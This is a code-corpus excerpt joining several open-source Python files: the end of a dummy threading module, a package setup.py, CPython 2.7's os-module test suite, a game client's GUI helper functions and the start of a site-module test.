If the executed function calls interrupt_main the KeyboardInterrupt will be
raised when the function returns.
"""
if type(args) != type(tuple()):
raise TypeError("2nd arg must be a tuple")
if type(kwargs) != type(dict()):
raise TypeError("3rd arg must be a dict")
global _main
_main = False
try:
function(*args, **kwargs)
except SystemExit:
pass
except:
_traceback.print_exc()
_main = True
global _interrupt
if _interrupt:
_interrupt = False
raise KeyboardInterrupt
def exit():
"""Dummy implementation of thread.exit()."""
raise SystemExit
def get_ident():
"""Dummy implementation of thread.get_ident().
Since this module should only be used when threadmodule is not
available, it is safe to assume that the current process is the
only thread. Thus a constant can be safely returned.
"""
return -1
def allocate_lock():
"""Dummy implementation of thread.allocate_lock()."""
return LockType()
def stack_size(size=None):
"""Dummy implementation of thread.stack_size()."""
if size is not None:
raise error("setting thread stack size not supported")
return 0
class LockType(object):
"""Class implementing dummy implementation of thread.LockType.
Compatibility is maintained by maintaining self.locked_status
which is a boolean that stores the state of the lock. Pickling of
the lock, though, should not be done since if the thread module is
then used with an unpickled ``lock()`` from here problems could
occur from this class not having atomic methods.
"""
def __init__(self):
self.locked_status = False
def acquire(self, waitflag=None):
"""Dummy implementation of acquire().
For blocking calls, self.locked_status is automatically set to
True and returned appropriately based on value of
``waitflag``. If it is non-blocking, then the value is
actually checked and not set if it is already acquired. This
is all done so that threading.Condition's assert statements
aren't triggered and throw a little fit.
"""
if waitflag is None or waitflag:
self.locked_status = True
return True
else:
if not self.locked_status:
self.locked_status = True
return True
else:
return False
__enter__ = acquire
def __exit__(self, typ, val, tb):
self.release()
def release(self):
"""Release the dummy lock."""
# XXX Perhaps shouldn't actually bother to test? Could lead
# to problems for complex, threaded code.
if not self.locked_status:
raise error
self.locked_status = False
return True
def locked(self):
return self.locked_status
# Used to signal that interrupt_main was called in a "thread"
_interrupt = False
# True when not executing in a "thread"
_main = True
def interrupt_main():
"""Set _interrupt flag to True to have start_new_thread raise
KeyboardInterrupt upon exiting."""
if _main:
raise KeyboardInterrupt
else:
global _interrupt
_interrupt = True
| apache-2.0 |
arielvega/uremix-app-developer-helper | src/setup.py | 1 | 1452 | #
#
# Copyright 2011,2013 Luis Ariel Vega Soliz, Uremix (http://www.uremix.org) and contributors.
#
#
# This file is part of UADH (Uremix App Developer Helper).
#
# UADH is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# UADH is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with UADH. If not, see <http://www.gnu.org/licenses/>.
#
#
'''
Created on 26/10/2011
@author: Luis Ariel Vega Soliz (ariel.vega@uremix.org)
@contact: Uremix Team (http://uremix.org)
'''
from setuptools import setup, find_packages
setup(name='uremix-app-developer-helper',
version='0.3.1',
description='Un conjunto de procedimientos de ayuda para el desarrollo de aplicaciones en Uremix (http://uremix.org)',
author='Luis Ariel Vega Soliz',
author_email='vsoliz.ariel@gmail.com',
url='https://github.com/arielvega/uremix-app-developer-helper',
license='GPL v3',
packages = find_packages(),
install_requires = ['python-configobj', 'python-gtk2']
)
| gpl-3.0 |
mancoast/CPythonPyc_test | crash/275_test_os.py | 20 | 32797 | # As a test suite for the os module, this is woefully inadequate, but this
# does add tests for a few functions which have been determined to be more
# portable than they had been thought to be.
import os
import errno
import unittest
import warnings
import sys
import signal
import subprocess
import time
from test import test_support
import mmap
import uuid
warnings.filterwarnings("ignore", "tempnam", RuntimeWarning, __name__)
warnings.filterwarnings("ignore", "tmpnam", RuntimeWarning, __name__)
# Tests creating TESTFN
class FileTests(unittest.TestCase):
def setUp(self):
if os.path.exists(test_support.TESTFN):
os.unlink(test_support.TESTFN)
tearDown = setUp
def test_access(self):
f = os.open(test_support.TESTFN, os.O_CREAT|os.O_RDWR)
os.close(f)
self.assertTrue(os.access(test_support.TESTFN, os.W_OK))
def test_closerange(self):
first = os.open(test_support.TESTFN, os.O_CREAT|os.O_RDWR)
# We must allocate two consecutive file descriptors, otherwise
# it will mess up other file descriptors (perhaps even the three
# standard ones).
second = os.dup(first)
try:
retries = 0
while second != first + 1:
os.close(first)
retries += 1
if retries > 10:
# XXX test skipped
self.skipTest("couldn't allocate two consecutive fds")
first, second = second, os.dup(second)
finally:
os.close(second)
# close a fd that is open, and one that isn't
os.closerange(first, first + 2)
self.assertRaises(OSError, os.write, first, "a")
@test_support.cpython_only
def test_rename(self):
path = unicode(test_support.TESTFN)
old = sys.getrefcount(path)
self.assertRaises(TypeError, os.rename, path, 0)
new = sys.getrefcount(path)
self.assertEqual(old, new)
class TemporaryFileTests(unittest.TestCase):
def setUp(self):
self.files = []
os.mkdir(test_support.TESTFN)
def tearDown(self):
for name in self.files:
os.unlink(name)
os.rmdir(test_support.TESTFN)
def check_tempfile(self, name):
# make sure it doesn't already exist:
self.assertFalse(os.path.exists(name),
"file already exists for temporary file")
# make sure we can create the file
open(name, "w")
self.files.append(name)
def test_tempnam(self):
if not hasattr(os, "tempnam"):
return
with warnings.catch_warnings():
warnings.filterwarnings("ignore", "tempnam", RuntimeWarning,
r"test_os$")
warnings.filterwarnings("ignore", "tempnam", DeprecationWarning)
self.check_tempfile(os.tempnam())
name = os.tempnam(test_support.TESTFN)
self.check_tempfile(name)
name = os.tempnam(test_support.TESTFN, "pfx")
self.assertTrue(os.path.basename(name)[:3] == "pfx")
self.check_tempfile(name)
def test_tmpfile(self):
if not hasattr(os, "tmpfile"):
return
# As with test_tmpnam() below, the Windows implementation of tmpfile()
# attempts to create a file in the root directory of the current drive.
# On Vista and Server 2008, this test will always fail for normal users
# as writing to the root directory requires elevated privileges. With
# XP and below, the semantics of tmpfile() are the same, but the user
# running the test is more likely to have administrative privileges on
# their account already. If that's the case, then os.tmpfile() should
# work. In order to make this test as useful as possible, rather than
# trying to detect Windows versions or whether or not the user has the
# right permissions, just try and create a file in the root directory
# and see if it raises a 'Permission denied' OSError. If it does, then
# test that a subsequent call to os.tmpfile() raises the same error. If
# it doesn't, assume we're on XP or below and the user running the test
# has administrative privileges, and proceed with the test as normal.
with warnings.catch_warnings():
warnings.filterwarnings("ignore", "tmpfile", DeprecationWarning)
if sys.platform == 'win32':
name = '\\python_test_os_test_tmpfile.txt'
if os.path.exists(name):
os.remove(name)
try:
fp = open(name, 'w')
except IOError, first:
# open() failed, assert tmpfile() fails in the same way.
# Although open() raises an IOError and os.tmpfile() raises an
# OSError(), 'args' will be (13, 'Permission denied') in both
# cases.
try:
fp = os.tmpfile()
except OSError, second:
self.assertEqual(first.args, second.args)
else:
self.fail("expected os.tmpfile() to raise OSError")
return
else:
# open() worked, therefore, tmpfile() should work. Close our
# dummy file and proceed with the test as normal.
fp.close()
os.remove(name)
fp = os.tmpfile()
fp.write("foobar")
fp.seek(0,0)
s = fp.read()
fp.close()
self.assertTrue(s == "foobar")
def test_tmpnam(self):
if not hasattr(os, "tmpnam"):
return
with warnings.catch_warnings():
warnings.filterwarnings("ignore", "tmpnam", RuntimeWarning,
r"test_os$")
warnings.filterwarnings("ignore", "tmpnam", DeprecationWarning)
name = os.tmpnam()
if sys.platform in ("win32",):
# The Windows tmpnam() seems useless. From the MS docs:
#
# The character string that tmpnam creates consists of
# the path prefix, defined by the entry P_tmpdir in the
# file STDIO.H, followed by a sequence consisting of the
# digit characters '0' through '9'; the numerical value
# of this string is in the range 1 - 65,535. Changing the
# definitions of L_tmpnam or P_tmpdir in STDIO.H does not
# change the operation of tmpnam.
#
# The really bizarre part is that, at least under MSVC6,
# P_tmpdir is "\\". That is, the path returned refers to
# the root of the current drive. That's a terrible place to
# put temp files, and, depending on privileges, the user
# may not even be able to open a file in the root directory.
self.assertFalse(os.path.exists(name),
"file already exists for temporary file")
else:
self.check_tempfile(name)
# Test attributes on return values from os.*stat* family.
class StatAttributeTests(unittest.TestCase):
def setUp(self):
os.mkdir(test_support.TESTFN)
self.fname = os.path.join(test_support.TESTFN, "f1")
f = open(self.fname, 'wb')
f.write("ABC")
f.close()
def tearDown(self):
os.unlink(self.fname)
os.rmdir(test_support.TESTFN)
def test_stat_attributes(self):
if not hasattr(os, "stat"):
return
import stat
result = os.stat(self.fname)
# Make sure direct access works
self.assertEqual(result[stat.ST_SIZE], 3)
self.assertEqual(result.st_size, 3)
# Make sure all the attributes are there
members = dir(result)
for name in dir(stat):
if name[:3] == 'ST_':
attr = name.lower()
if name.endswith("TIME"):
def trunc(x): return int(x)
else:
def trunc(x): return x
self.assertEqual(trunc(getattr(result, attr)),
result[getattr(stat, name)])
self.assertIn(attr, members)
try:
result[200]
self.fail("No exception raised")
except IndexError:
pass
# Make sure that assignment fails
try:
result.st_mode = 1
self.fail("No exception raised")
except (AttributeError, TypeError):
pass
try:
result.st_rdev = 1
self.fail("No exception raised")
except (AttributeError, TypeError):
pass
try:
result.parrot = 1
self.fail("No exception raised")
except AttributeError:
pass
# Use the stat_result constructor with a too-short tuple.
try:
result2 = os.stat_result((10,))
self.fail("No exception raised")
except TypeError:
pass
# Use the constructor with a too-long tuple.
try:
result2 = os.stat_result((0,1,2,3,4,5,6,7,8,9,10,11,12,13,14))
except TypeError:
pass
def test_statvfs_attributes(self):
if not hasattr(os, "statvfs"):
return
try:
result = os.statvfs(self.fname)
except OSError, e:
# On AtheOS, glibc always returns ENOSYS
if e.errno == errno.ENOSYS:
return
# Make sure direct access works
self.assertEqual(result.f_bfree, result[3])
# Make sure all the attributes are there.
members = ('bsize', 'frsize', 'blocks', 'bfree', 'bavail', 'files',
'ffree', 'favail', 'flag', 'namemax')
for value, member in enumerate(members):
self.assertEqual(getattr(result, 'f_' + member), result[value])
# Make sure that assignment really fails
try:
result.f_bfree = 1
self.fail("No exception raised")
except TypeError:
pass
try:
result.parrot = 1
self.fail("No exception raised")
except AttributeError:
pass
# Use the constructor with a too-short tuple.
try:
result2 = os.statvfs_result((10,))
self.fail("No exception raised")
except TypeError:
pass
# Use the constructor with a too-long tuple.
try:
result2 = os.statvfs_result((0,1,2,3,4,5,6,7,8,9,10,11,12,13,14))
except TypeError:
pass
def test_utime_dir(self):
delta = 1000000
st = os.stat(test_support.TESTFN)
# round to int, because some systems may support sub-second
# time stamps in stat, but not in utime.
os.utime(test_support.TESTFN, (st.st_atime, int(st.st_mtime-delta)))
st2 = os.stat(test_support.TESTFN)
self.assertEqual(st2.st_mtime, int(st.st_mtime-delta))
# Restrict test to Win32, since there is no guarantee other
# systems support centiseconds
if sys.platform == 'win32':
def get_file_system(path):
root = os.path.splitdrive(os.path.abspath(path))[0] + '\\'
import ctypes
kernel32 = ctypes.windll.kernel32
buf = ctypes.create_string_buffer("", 100)
if kernel32.GetVolumeInformationA(root, None, 0, None, None, None, buf, len(buf)):
return buf.value
if get_file_system(test_support.TESTFN) == "NTFS":
def test_1565150(self):
t1 = 1159195039.25
os.utime(self.fname, (t1, t1))
self.assertEqual(os.stat(self.fname).st_mtime, t1)
def test_large_time(self):
t1 = 5000000000 # some day in 2128
os.utime(self.fname, (t1, t1))
self.assertEqual(os.stat(self.fname).st_mtime, t1)
def test_1686475(self):
# Verify that an open file can be stat'ed
try:
os.stat(r"c:\pagefile.sys")
except WindowsError, e:
if e.errno == 2: # file does not exist; cannot run test
return
self.fail("Could not stat pagefile.sys")
from test import mapping_tests
class EnvironTests(mapping_tests.BasicTestMappingProtocol):
"""check that os.environ object conform to mapping protocol"""
type2test = None
def _reference(self):
return {"KEY1":"VALUE1", "KEY2":"VALUE2", "KEY3":"VALUE3"}
def _empty_mapping(self):
os.environ.clear()
return os.environ
def setUp(self):
self.__save = dict(os.environ)
os.environ.clear()
def tearDown(self):
os.environ.clear()
os.environ.update(self.__save)
# Bug 1110478
def test_update2(self):
if os.path.exists("/bin/sh"):
os.environ.update(HELLO="World")
with os.popen("/bin/sh -c 'echo $HELLO'") as popen:
value = popen.read().strip()
self.assertEqual(value, "World")
# On FreeBSD < 7 and OS X < 10.6, unsetenv() doesn't return a value (issue
# #13415).
@unittest.skipIf(sys.platform.startswith(('freebsd', 'darwin')),
"due to known OS bug: see issue #13415")
def test_unset_error(self):
if sys.platform == "win32":
# an environment variable is limited to 32,767 characters
key = 'x' * 50000
self.assertRaises(ValueError, os.environ.__delitem__, key)
else:
# "=" is not allowed in a variable name
key = 'key='
self.assertRaises(OSError, os.environ.__delitem__, key)
class WalkTests(unittest.TestCase):
"""Tests for os.walk()."""
def test_traversal(self):
import os
from os.path import join
# Build:
# TESTFN/
# TEST1/ a file kid and two directory kids
# tmp1
# SUB1/ a file kid and a directory kid
# tmp2
# SUB11/ no kids
# SUB2/ a file kid and a dirsymlink kid
# tmp3
# link/ a symlink to TESTFN.2
# TEST2/
# tmp4 a lone file
walk_path = join(test_support.TESTFN, "TEST1")
sub1_path = join(walk_path, "SUB1")
sub11_path = join(sub1_path, "SUB11")
sub2_path = join(walk_path, "SUB2")
tmp1_path = join(walk_path, "tmp1")
tmp2_path = join(sub1_path, "tmp2")
tmp3_path = join(sub2_path, "tmp3")
link_path = join(sub2_path, "link")
t2_path = join(test_support.TESTFN, "TEST2")
tmp4_path = join(test_support.TESTFN, "TEST2", "tmp4")
# Create stuff.
os.makedirs(sub11_path)
os.makedirs(sub2_path)
os.makedirs(t2_path)
for path in tmp1_path, tmp2_path, tmp3_path, tmp4_path:
f = file(path, "w")
f.write("I'm " + path + " and proud of it. Blame test_os.\n")
f.close()
if hasattr(os, "symlink"):
os.symlink(os.path.abspath(t2_path), link_path)
sub2_tree = (sub2_path, ["link"], ["tmp3"])
else:
sub2_tree = (sub2_path, [], ["tmp3"])
# Walk top-down.
all = list(os.walk(walk_path))
self.assertEqual(len(all), 4)
# We can't know which order SUB1 and SUB2 will appear in.
# Not flipped: TESTFN, SUB1, SUB11, SUB2
# flipped: TESTFN, SUB2, SUB1, SUB11
flipped = all[0][1][0] != "SUB1"
all[0][1].sort()
self.assertEqual(all[0], (walk_path, ["SUB1", "SUB2"], ["tmp1"]))
self.assertEqual(all[1 + flipped], (sub1_path, ["SUB11"], ["tmp2"]))
self.assertEqual(all[2 + flipped], (sub11_path, [], []))
self.assertEqual(all[3 - 2 * flipped], sub2_tree)
# Prune the search.
all = []
for root, dirs, files in os.walk(walk_path):
all.append((root, dirs, files))
# Don't descend into SUB1.
if 'SUB1' in dirs:
# Note that this also mutates the dirs we appended to all!
dirs.remove('SUB1')
self.assertEqual(len(all), 2)
self.assertEqual(all[0], (walk_path, ["SUB2"], ["tmp1"]))
self.assertEqual(all[1], sub2_tree)
# Walk bottom-up.
all = list(os.walk(walk_path, topdown=False))
self.assertEqual(len(all), 4)
# We can't know which order SUB1 and SUB2 will appear in.
# Not flipped: SUB11, SUB1, SUB2, TESTFN
# flipped: SUB2, SUB11, SUB1, TESTFN
flipped = all[3][1][0] != "SUB1"
all[3][1].sort()
self.assertEqual(all[3], (walk_path, ["SUB1", "SUB2"], ["tmp1"]))
self.assertEqual(all[flipped], (sub11_path, [], []))
self.assertEqual(all[flipped + 1], (sub1_path, ["SUB11"], ["tmp2"]))
self.assertEqual(all[2 - 2 * flipped], sub2_tree)
if hasattr(os, "symlink"):
# Walk, following symlinks.
for root, dirs, files in os.walk(walk_path, followlinks=True):
if root == link_path:
self.assertEqual(dirs, [])
self.assertEqual(files, ["tmp4"])
break
else:
self.fail("Didn't follow symlink with followlinks=True")
def tearDown(self):
# Tear everything down. This is a decent use for bottom-up on
# Windows, which doesn't have a recursive delete command. The
# (not so) subtlety is that rmdir will fail unless the dir's
# kids are removed first, so bottom up is essential.
for root, dirs, files in os.walk(test_support.TESTFN, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
dirname = os.path.join(root, name)
if not os.path.islink(dirname):
os.rmdir(dirname)
else:
os.remove(dirname)
os.rmdir(test_support.TESTFN)
class MakedirTests (unittest.TestCase):
def setUp(self):
os.mkdir(test_support.TESTFN)
def test_makedir(self):
base = test_support.TESTFN
path = os.path.join(base, 'dir1', 'dir2', 'dir3')
os.makedirs(path) # Should work
path = os.path.join(base, 'dir1', 'dir2', 'dir3', 'dir4')
os.makedirs(path)
# Try paths with a '.' in them
self.assertRaises(OSError, os.makedirs, os.curdir)
path = os.path.join(base, 'dir1', 'dir2', 'dir3', 'dir4', 'dir5', os.curdir)
os.makedirs(path)
path = os.path.join(base, 'dir1', os.curdir, 'dir2', 'dir3', 'dir4',
'dir5', 'dir6')
os.makedirs(path)
def tearDown(self):
path = os.path.join(test_support.TESTFN, 'dir1', 'dir2', 'dir3',
'dir4', 'dir5', 'dir6')
# If the tests failed, the bottom-most directory ('../dir6')
# may not have been created, so we look for the outermost directory
# that exists.
while not os.path.exists(path) and path != test_support.TESTFN:
path = os.path.dirname(path)
os.removedirs(path)
class DevNullTests (unittest.TestCase):
def test_devnull(self):
f = file(os.devnull, 'w')
f.write('hello')
f.close()
f = file(os.devnull, 'r')
self.assertEqual(f.read(), '')
f.close()
class URandomTests (unittest.TestCase):
def test_urandom_length(self):
self.assertEqual(len(os.urandom(0)), 0)
self.assertEqual(len(os.urandom(1)), 1)
self.assertEqual(len(os.urandom(10)), 10)
self.assertEqual(len(os.urandom(100)), 100)
self.assertEqual(len(os.urandom(1000)), 1000)
def test_urandom_value(self):
data1 = os.urandom(16)
data2 = os.urandom(16)
self.assertNotEqual(data1, data2)
def get_urandom_subprocess(self, count):
# We need to use repr() and eval() to avoid line ending conversions
# under Windows.
code = '\n'.join((
'import os, sys',
'data = os.urandom(%s)' % count,
'sys.stdout.write(repr(data))',
'sys.stdout.flush()',
'print >> sys.stderr, (len(data), data)'))
cmd_line = [sys.executable, '-c', code]
p = subprocess.Popen(cmd_line, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
self.assertEqual(p.wait(), 0, (p.wait(), err))
out = eval(out)
self.assertEqual(len(out), count, err)
return out
def test_urandom_subprocess(self):
data1 = self.get_urandom_subprocess(16)
data2 = self.get_urandom_subprocess(16)
self.assertNotEqual(data1, data2)
def test_execvpe_with_bad_arglist(self):
self.assertRaises(ValueError, os.execvpe, 'notepad', [], None)
class Win32ErrorTests(unittest.TestCase):
def test_rename(self):
self.assertRaises(WindowsError, os.rename, test_support.TESTFN, test_support.TESTFN+".bak")
def test_remove(self):
self.assertRaises(WindowsError, os.remove, test_support.TESTFN)
def test_chdir(self):
self.assertRaises(WindowsError, os.chdir, test_support.TESTFN)
def test_mkdir(self):
f = open(test_support.TESTFN, "w")
try:
self.assertRaises(WindowsError, os.mkdir, test_support.TESTFN)
finally:
f.close()
os.unlink(test_support.TESTFN)
def test_utime(self):
self.assertRaises(WindowsError, os.utime, test_support.TESTFN, None)
def test_chmod(self):
self.assertRaises(WindowsError, os.chmod, test_support.TESTFN, 0)
class TestInvalidFD(unittest.TestCase):
singles = ["fchdir", "fdopen", "dup", "fdatasync", "fstat",
"fstatvfs", "fsync", "tcgetpgrp", "ttyname"]
#singles.append("close")
#We omit close because it doesn'r raise an exception on some platforms
def get_single(f):
def helper(self):
if hasattr(os, f):
self.check(getattr(os, f))
return helper
for f in singles:
locals()["test_"+f] = get_single(f)
def check(self, f, *args):
try:
f(test_support.make_bad_fd(), *args)
except OSError as e:
self.assertEqual(e.errno, errno.EBADF)
else:
self.fail("%r didn't raise a OSError with a bad file descriptor"
% f)
def test_isatty(self):
if hasattr(os, "isatty"):
self.assertEqual(os.isatty(test_support.make_bad_fd()), False)
def test_closerange(self):
if hasattr(os, "closerange"):
fd = test_support.make_bad_fd()
# Make sure none of the descriptors we are about to close are
# currently valid (issue 6542).
for i in range(10):
try: os.fstat(fd+i)
except OSError:
pass
else:
break
if i < 2:
raise unittest.SkipTest(
"Unable to acquire a range of invalid file descriptors")
self.assertEqual(os.closerange(fd, fd + i-1), None)
def test_dup2(self):
if hasattr(os, "dup2"):
self.check(os.dup2, 20)
def test_fchmod(self):
if hasattr(os, "fchmod"):
self.check(os.fchmod, 0)
def test_fchown(self):
if hasattr(os, "fchown"):
self.check(os.fchown, -1, -1)
def test_fpathconf(self):
if hasattr(os, "fpathconf"):
self.check(os.fpathconf, "PC_NAME_MAX")
def test_ftruncate(self):
if hasattr(os, "ftruncate"):
self.check(os.ftruncate, 0)
def test_lseek(self):
if hasattr(os, "lseek"):
self.check(os.lseek, 0, 0)
def test_read(self):
if hasattr(os, "read"):
self.check(os.read, 1)
def test_tcsetpgrpt(self):
if hasattr(os, "tcsetpgrp"):
self.check(os.tcsetpgrp, 0)
def test_write(self):
if hasattr(os, "write"):
self.check(os.write, " ")
if sys.platform != 'win32':
class Win32ErrorTests(unittest.TestCase):
pass
class PosixUidGidTests(unittest.TestCase):
if hasattr(os, 'setuid'):
def test_setuid(self):
if os.getuid() != 0:
self.assertRaises(os.error, os.setuid, 0)
self.assertRaises(OverflowError, os.setuid, 1<<32)
if hasattr(os, 'setgid'):
def test_setgid(self):
if os.getuid() != 0:
self.assertRaises(os.error, os.setgid, 0)
self.assertRaises(OverflowError, os.setgid, 1<<32)
if hasattr(os, 'seteuid'):
def test_seteuid(self):
if os.getuid() != 0:
self.assertRaises(os.error, os.seteuid, 0)
self.assertRaises(OverflowError, os.seteuid, 1<<32)
if hasattr(os, 'setegid'):
def test_setegid(self):
if os.getuid() != 0:
self.assertRaises(os.error, os.setegid, 0)
self.assertRaises(OverflowError, os.setegid, 1<<32)
if hasattr(os, 'setreuid'):
def test_setreuid(self):
if os.getuid() != 0:
self.assertRaises(os.error, os.setreuid, 0, 0)
self.assertRaises(OverflowError, os.setreuid, 1<<32, 0)
self.assertRaises(OverflowError, os.setreuid, 0, 1<<32)
def test_setreuid_neg1(self):
# Needs to accept -1. We run this in a subprocess to avoid
# altering the test runner's process state (issue8045).
subprocess.check_call([
sys.executable, '-c',
'import os,sys;os.setreuid(-1,-1);sys.exit(0)'])
if hasattr(os, 'setregid'):
def test_setregid(self):
if os.getuid() != 0:
self.assertRaises(os.error, os.setregid, 0, 0)
self.assertRaises(OverflowError, os.setregid, 1<<32, 0)
self.assertRaises(OverflowError, os.setregid, 0, 1<<32)
def test_setregid_neg1(self):
# Needs to accept -1. We run this in a subprocess to avoid
# altering the test runner's process state (issue8045).
subprocess.check_call([
sys.executable, '-c',
'import os,sys;os.setregid(-1,-1);sys.exit(0)'])
else:
class PosixUidGidTests(unittest.TestCase):
pass
@unittest.skipUnless(sys.platform == "win32", "Win32 specific tests")
class Win32KillTests(unittest.TestCase):
def _kill(self, sig):
# Start sys.executable as a subprocess and communicate from the
# subprocess to the parent that the interpreter is ready. When it
# becomes ready, send *sig* via os.kill to the subprocess and check
# that the return code is equal to *sig*.
import ctypes
from ctypes import wintypes
import msvcrt
# Since we can't access the contents of the process' stdout until the
# process has exited, use PeekNamedPipe to see what's inside stdout
# without waiting. This is done so we can tell that the interpreter
# is started and running at a point where it could handle a signal.
PeekNamedPipe = ctypes.windll.kernel32.PeekNamedPipe
PeekNamedPipe.restype = wintypes.BOOL
PeekNamedPipe.argtypes = (wintypes.HANDLE, # Pipe handle
ctypes.POINTER(ctypes.c_char), # stdout buf
wintypes.DWORD, # Buffer size
ctypes.POINTER(wintypes.DWORD), # bytes read
ctypes.POINTER(wintypes.DWORD), # bytes avail
ctypes.POINTER(wintypes.DWORD)) # bytes left
msg = "running"
proc = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('{}');"
"sys.stdout.flush();"
"input()".format(msg)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
self.addCleanup(proc.stdout.close)
self.addCleanup(proc.stderr.close)
self.addCleanup(proc.stdin.close)
count, max = 0, 100
while count < max and proc.poll() is None:
# Create a string buffer to store the result of stdout from the pipe
buf = ctypes.create_string_buffer(len(msg))
# Obtain the text currently in proc.stdout
# Bytes read/avail/left are left as NULL and unused
rslt = PeekNamedPipe(msvcrt.get_osfhandle(proc.stdout.fileno()),
buf, ctypes.sizeof(buf), None, None, None)
self.assertNotEqual(rslt, 0, "PeekNamedPipe failed")
if buf.value:
self.assertEqual(msg, buf.value)
break
time.sleep(0.1)
count += 1
else:
self.fail("Did not receive communication from the subprocess")
os.kill(proc.pid, sig)
self.assertEqual(proc.wait(), sig)
def test_kill_sigterm(self):
# SIGTERM doesn't mean anything special, but make sure it works
self._kill(signal.SIGTERM)
def test_kill_int(self):
# os.kill on Windows can take an int which gets set as the exit code
self._kill(100)
def _kill_with_event(self, event, name):
tagname = "test_os_%s" % uuid.uuid1()
m = mmap.mmap(-1, 1, tagname)
m[0] = '0'
# Run a script which has console control handling enabled.
proc = subprocess.Popen([sys.executable,
os.path.join(os.path.dirname(__file__),
"win_console_handler.py"), tagname],
creationflags=subprocess.CREATE_NEW_PROCESS_GROUP)
# Let the interpreter startup before we send signals. See #3137.
count, max = 0, 20
while count < max and proc.poll() is None:
if m[0] == '1':
break
time.sleep(0.5)
count += 1
else:
self.fail("Subprocess didn't finish initialization")
os.kill(proc.pid, event)
# proc.send_signal(event) could also be done here.
# Allow time for the signal to be passed and the process to exit.
time.sleep(0.5)
if not proc.poll():
# Forcefully kill the process if we weren't able to signal it.
os.kill(proc.pid, signal.SIGINT)
self.fail("subprocess did not stop on {}".format(name))
@unittest.skip("subprocesses aren't inheriting CTRL+C property")
def test_CTRL_C_EVENT(self):
from ctypes import wintypes
import ctypes
# Make a NULL value by creating a pointer with no argument.
NULL = ctypes.POINTER(ctypes.c_int)()
SetConsoleCtrlHandler = ctypes.windll.kernel32.SetConsoleCtrlHandler
SetConsoleCtrlHandler.argtypes = (ctypes.POINTER(ctypes.c_int),
wintypes.BOOL)
SetConsoleCtrlHandler.restype = wintypes.BOOL
# Calling this with NULL and FALSE causes the calling process to
# handle CTRL+C, rather than ignore it. This property is inherited
# by subprocesses.
SetConsoleCtrlHandler(NULL, 0)
self._kill_with_event(signal.CTRL_C_EVENT, "CTRL_C_EVENT")
def test_CTRL_BREAK_EVENT(self):
self._kill_with_event(signal.CTRL_BREAK_EVENT, "CTRL_BREAK_EVENT")
def test_main():
test_support.run_unittest(
FileTests,
TemporaryFileTests,
StatAttributeTests,
EnvironTests,
WalkTests,
MakedirTests,
DevNullTests,
URandomTests,
Win32ErrorTests,
TestInvalidFD,
PosixUidGidTests,
Win32KillTests
)
if __name__ == "__main__":
test_main()
| gpl-3.0 |
beast-arena/beast-arena | clientGui/ClientGuiLogic.py | 2 | 3312 | import datetime, time
"""
module for logical calculation stuff needed by gui implementations
"""
def parseStartTime(startTime):
"""
creates a datetime object from a string, generated by time.asctime
@param startTime string: time string in format: %a %b %d %H:%M:%S %Y
"""
currentDay=datetime.datetime.now().day
currentMonth=datetime.datetime.now().month
try:
seconds=float(startTime)
t=time.time() + seconds
timeString = time.ctime(t)
timeStringSplit= timeString[11:]
return datetime.datetime.strptime(timeStringSplit,'%H:%M:%S %Y').replace(month=currentMonth,day=currentDay)
except:
try:
t= str(startTime)[11:]
return datetime.datetime.strptime(t,'%H:%M:%S %Y').replace(month=currentMonth,day=currentDay)
except:
return
def readServersFromFile(comboBox,serverMap):
"""
reads server addresses from a file and adds them to an passed combo box a map
@param comboBox: combo box to insert an item containing the servers host and port
@param serverMap: map to insert an value containing the servers address, port and path of certificate
"""
try:
serverFile = open('../clientGui/resources/serverAddresses.txt', 'r')
servers = serverFile.readlines()
for i in range(len(servers)):
split = servers[i].rstrip().split(':', 3)
if len(split) == 3:
hostPort = split[0] + ':' + split[1]
cert = split[2]
comboBox.insertItem(i, hostPort)
serverMap[hostPort] = (split[0], split[1], cert)
serverFile.close()
except Exception:
pass
def appendServerToFile(server):
"""
writes a server address into a file
"""
try:
serverFile = open('../clientGui/resources/serverAddresses.txt', 'r')
servers = serverFile.readlines()
except Exception:
servers = []
serversWrite = open('../clientGui/resources/serverAddresses.txt', 'a')
if server not in servers:
serversWrite.write(str(server))
serversWrite.close()
try:
serverFile.close()
except:
pass
def updateWaitingProgressBar(bar):
"""
updates the value of a passed progress bar, invert the appearance if the value reaches hundred and zero
@param bar: progress bar which value should be changed
"""
progressValue=bar.value()
if progressValue < 100 and str(bar.statusTip())=='forward':
progressValue += 1
bar.setInvertedAppearance(False)
else:
bar.setInvertedAppearance(True)
bar.setStatusTip('backward')
progressValue -= 1
if progressValue == 0:
bar.setStatusTip('forward')
bar.setValue(progressValue)
def updateProgressBar(bar, countdownBarStartTime, gameStartTime):
totalWaitingTime = timedeltaToTotalSeconds(gameStartTime - countdownBarStartTime)
elapsedWaitingTime = totalWaitingTime - timedeltaToTotalSeconds(gameStartTime - datetime.datetime.now())
bar.setValue(elapsedWaitingTime/totalWaitingTime*100)
def timedeltaToTotalSeconds(td):
return (td.microseconds + (td.seconds + td.days * 24 * 3600) * 1e6) / 1e6
if __name__=='__main__':
parseStartTime(12)
| gpl-3.0 |
adaussy/eclipse-monkey-revival | plugins/python/org.eclipse.eclipsemonkey.lang.python/Lib/test/test_site.py | 2 | 15760 | """Tests for 'site'.
Tests assume the initial paths in sys.path once the interpreter has begun
executing have not been removed.
"""
import unittest
from test.test_support import run_unittest, TESTFN, EnvironmentVarGuard
from test.test_support import captured_output, is_jython
import __builtin__
import os
import sys
import re
import encodings
import subprocess
import sysconfig
from copy import copy
# Need to make sure to not import 'site' if someone specified ``-S`` at the
# command-line. Detect this by just making sure 'site' has not been imported
# already.
if "site" in sys.modules:
import site
else:
raise unittest.SkipTest("importation of site.py suppressed")
if site.ENABLE_USER_SITE and not os.path.isdir(site.USER_SITE):
# need to add user site directory for tests
os.makedirs(site.USER_SITE)
site.addsitedir(site.USER_SITE)
class HelperFunctionsTests(unittest.TestCase):
"""Tests for helper functions.
